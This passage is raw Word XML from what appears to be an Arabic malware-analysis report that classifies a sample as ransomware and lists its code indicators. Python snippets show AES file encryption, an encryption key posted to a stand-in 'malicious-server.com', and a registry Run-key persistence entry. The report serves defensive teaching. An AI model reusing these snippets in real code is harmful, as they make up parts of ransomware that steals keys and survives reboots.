          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>C2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414E2F40" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">• تشفير الملفات وطلب فدية من المستخدمين مقابل فك التشفير، وهو مؤشر على برمجيات الفدية. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7775ED" w14:textId="08B3761E" w:rsidR="00BD3CF0" w:rsidRPr="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="00BD3CF0">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD3CF0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">تصنيف البرمجية الضارة </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F3F078" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">بناءً على الأنشطة المرصودة، يمكن تصنيف البرمجية ضمن إحدى الفئات التالية: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F6BB90" w14:textId="1FF02483" w:rsidR="006F1D73" w:rsidRDefault="00E97884" w:rsidP="00EF2EC0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
          <w:lang w:val="ar-EG" w:bidi="ar-EG"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="21E8C424" wp14:editId="335BAE76">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1362974</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4368536" cy="4218305"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="2085340224" name="صورة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5340224" name="صورة 2085340224"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4368536" cy="4218305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66557198" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">التصنيف النهائي: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F3CF9F" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t>نظرًا لاعتماد البرمجية على تشفير البيانات وابتزاز المستخدمين ماليًا، فإنها تنتمي إلى برمجيات الفدية (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Ransomware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02710D30" w14:textId="4B7C140D" w:rsidR="00BD3CF0" w:rsidRPr="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="00BD3CF0">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD3CF0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">فحص الشيفرة البرمجية </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461398AB" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">في حال توفر الشيفرة المصدرية أو إمكانية إجراء هندسة عكسية، يمكن ملاحظة بعض الخصائص البرمجية الدالة على النشاط الخبيث، مثل: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D4B4BB" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">• استخدام خوارزميات تشفير لقفل الملفات: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13266E43" w14:textId="7BAC9D96" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>rom Crypto.Cipher import AES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4460AB46" w14:textId="7FF437BE" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">ipher = AES.new(key, AES.MODE_CBC, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>v)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B977957" w14:textId="6D6287A5" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>ncrypted_data = cipher.encrypt(pad(file_data, AES.block_size))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D16E170" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">• إرسال بيانات إلى خادم خارجي، مما يشير إلى احتمال تسريب معلومات حساسة: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D34F91" w14:textId="68EB9F50" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>mport requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A04B42" w14:textId="1AF4323A" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>equests.post("http://malicious-server.com", data={"key": encryption_key})</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A741E29" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">• إضافة مفاتيح إلى سجل النظام لضمان تشغيل البرمجية مع بدء تشغيل الجهاز: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B5D60D" w14:textId="639D31E7" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>mport winreg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E16B51" w14:textId="5D1A3093" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>ey = winreg.OpenKey(winreg.HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, winreg.KEY_SET_VALUE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDEDDE9" w14:textId="63D4016F" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>inreg.SetValueEx(key, "Malware", 0, winreg.REG_SZ, "C:\\path\\to\\malware.exe")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F42B88" w14:textId="5747EDFE" w:rsidR="00BD3CF0" w:rsidRPr="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="00BD3CF0">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD3CF0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">استراتيجيات الحماية وتقليل المخاطر </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6936CBDB" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">للتصدي لهذا النوع من الهجمات، يُوصى بتطبيق مجموعة من الإجراءات الوقائية، منها: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76378D63" w14:textId="3CF38591" w:rsidR="00BD3CF0" w:rsidRPr="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="00BD3CF0">
      <w:pPr>
        <w:pStyle w:val="a6"/>
